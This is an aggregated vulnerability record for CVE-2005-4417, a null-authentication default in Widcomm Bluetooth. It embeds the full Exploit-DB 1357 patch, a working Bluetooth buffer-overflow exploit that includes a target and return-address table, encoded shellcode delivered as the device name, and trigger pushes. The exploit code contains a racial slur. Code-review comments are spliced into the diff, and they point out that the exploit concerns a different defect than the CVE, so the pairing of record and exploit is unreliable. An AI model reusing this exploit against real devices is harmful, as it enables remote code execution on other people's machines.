CVE-2005-4417
CVSS6.4
Published: 2005-12-20 06:03:00
Revised: 2008-09-05 16:56:50
NMCOE    

[Original] The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, as installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly other devices, sets null Authentication and Authorization values, which allows remote attackers to send arbitrary audio and possibly eavesdrop using the microphone via the Hands Free Audio Gateway and Headset profile.


[CNNVD] Widcomm Bluetooth for Windows remote attack vulnerability (CNNVD-200512-459)

        The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, when installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly on other devices, sets null Authentication and Authorization values, allowing remote attackers to send arbitrary audio via the Hands Free Audio Gateway and Headset profiles and possibly to eavesdrop using the microphone.

- CVSS (base score)

CVSS score: 6.4 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:belkin:bluetooth_software:1.4.2_build_10
cpe:/a:widcomm:bluetooth_for_windows:4.0.1.1500
cpe:/a:anycom:blue_usb-130-250_software:4.0.1.1500

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4417
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4417
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-459
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/archive/1/419642/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051216 DMA[2005-1214a] - 'Widcomm BTW - Bluetooth for Windows Remote Audio Eavesdropping'

- Vulnerability information

Widcomm Bluetooth for Windows remote attack vulnerability
Medium Unknown
2005-12-20 00:00:00 2005-12-20 00:00:00
Remote
        The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, when installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly on other devices, sets null Authentication and Authorization values, allowing remote attackers to send arbitrary audio via the Hands Free Audio Gateway and Headset profiles and possibly to eavesdrop using the microphone.

- Advisories and patches


- Vulnerability information (1357)

WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit (EDBID:1357)
windows remote
2005-12-04 Verified
0 Kevin Finisterre
N/A
--- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+   http://www.digitalmunition.com
+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
+   http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
  * UNrooted.net example code
  *
  * Most of these functions are just rips from the Affix Bluetooth project OBEX
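Review bot: the header comment added here attributes the modification to the PenTest advisory ptl-2004-03 ("the Widcomm Overflows"), i.e. a buffer overflow, while the record this exploit is attached to (CVE-2005-4417, above) describes null Authentication/Authorization defaults in the Hands Free Audio Gateway and Headset profiles. The two are different Widcomm defects, so this patch should not be read as a proof of concept for CVE-2005-4417; the record's pairing of EDB 1357 with this CVE deserves a note to that effect.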
@@ -62,7 +68,10 @@
 
 #include "obex_socket.h"
 
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH        5
 
@@ -316,6 +325,9 @@
 	switch (event)  {
         case OBEX_EV_PROGRESS:
 		printf("Made some progress...\n");
+		sleep(3);
+		printf("Peace nigga...\n");
+		exit(0);
 		break;
 
         case OBEX_EV_ABORT:
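Review bot: calling exit(0) from inside the OBEX_EV_PROGRESS case makes the `break` that follows it unreachable and terminates the process from within the event callback, so none of the cleanup that obex_push() or main() would otherwise perform after a transfer (closing the OBEX handle, closing the HCI socket opened in set_device_name()) ever runs; if the intent is to stop after the first progress event, return an error code to the caller instead. The printed string on the line before it also contains a racial slur that should simply be removed.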
@@ -382,9 +394,7 @@
 	name = remote;
 
 	name_len = (strlen(name)+1)<<1;
-	if( (namebuf = g_malloc(name_len)) )    {
-		OBEX_CharToUnicode(namebuf, name, name_len);
-	}
+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
 
 	buf = easy_readfile(path, &file_size);
 	if(buf == NULL) {
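Review bot: with `namebuf = name;` the UTF-16 conversion is gone, but `name_len = (strlen(name)+1)<<1;` two lines above is still computed and no longer used, so it is dead code and should be dropped; `namebuf` now also aliases a string owned by the caller rather than a g_malloc()'d buffer, so any g_free(namebuf) that was paired with the removed allocation elsewhere in the function must be removed as well or it will free memory this function did not allocate.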
@@ -424,6 +434,24 @@
 	return err;
 }
 
+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+	}
+
+}
 
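Review bot: set_device_name() never closes the descriptor returned by hci_open_dev() (no hci_close_dev(s) on either the success or the error path), the `ctl` parameter is unused, `opt` is declared `char *` while the only caller passes an `unsigned char[]` (a pointer-signedness warning), and the 2000 ms timeout given to hci_write_local_name() is a magic number that wants a named constant. From the defensive side this hunk is the one worth understanding: the local device name is attacker-supplied data that a peer stack stores and later processes, which is why a Bluetooth stack must bound the length of, and otherwise treat as untrusted, every remote device name it receives.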
 /*
  * That's all there is to it.  With it all setup like this all I have to do
@@ -434,19 +462,87 @@
 
 int main( int argc, char **argv )
 {
-	if ( argc != 4 ) {
-		printf("%s\n\n"
-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
-		       "\tDEVICE        = RFCOMM TTY device file\n"
-		       "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
-		       "\tLFILE         = Local file path\n"
-		       "\tRFILE         = Remote file name\n\n",
-		       UPUSH_APPNAME, argv[0]);
+/* 
+	The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+	struct
+	{
+  		char *os;
+  		u_long ret;
+	}
+ 	targets[] =
+ 	{
+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+  		{ "[ Crash ]", 0x41424344 },
+	}, v;
+
+	if ( argc != 3 ) {
+		printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET 	= Target number\n",UPUSH_APPNAME,argv[0]);
+		printf("Types:\n");
+		int i;
+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+  		printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
 		return( -1 );
 	}
 
-	printf( "pushing file %s\n", argv[2] );
-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
+	/* this still crashes the BTStackServer.exe... but oh well */
+	unsigned char scode[] = 
+	"\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+	"\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+	"\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+	"\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+	"\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+	"\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+	"\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+	"\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+	"\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+	"\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+	"\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+	"\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+	"\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+	"\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+	
+	set_device_name(0,0,scode);
+	//printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+	//printf( "pushing file.\n");
+
+	char buf[3000];
+	memset(buf,'\0',sizeof(buf));
+	memset(buf,'Z',3); // Sometimes u need 3 z's 
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        	printf("[-] Selected target:\n");
+              	printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);              
+        }
+
+	int x;
+	for(x=0; x<=122; x=x+1)
+	{
+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+	}
+	// Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+		printf( "error\n" );
+		return( -1 );
+	}
+	printf("\nsleeping 3 seconds before triggering the shellcode\n"); 
+	sleep(3);
+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 		printf( "error\n" );
 		return( -1 );
 	}
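Review bot: `type` is taken straight from atoi(argv[2]) and used to index `targets[type]` without ever being compared against sizeof(targets)/sizeof(v); the `if(type)` test only decides whether to print the selection, so a negative or too-large argument reads past the end of the table. The usage text is also out of step with the new argument handling: argc is now compared with 3 and both file names are hard-coded ("/etc/hosts" and a fixed remote name), yet the help string still advertises LFILE and RFILE alongside TARGET. Finally, the comment block recommending `auth disable; encrypt disable;` in hcid.conf documents turning off Security Mode 3 on the sending host; that is the same class of weak default, no authentication and no authorization on a profile, that CVE-2005-4417 describes on the Widcomm side, and the corresponding mitigation for the record as a whole is the inverse setting: require authentication and authorization for the Hands Free and Headset services rather than accepting null values.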

// milw0rm.com [2005-12-04]
		

- Vulnerability information

22800
WIDCOMM Bluetooth Null Authentication/Authorization Remote Audio Manipulation
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-12-16 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete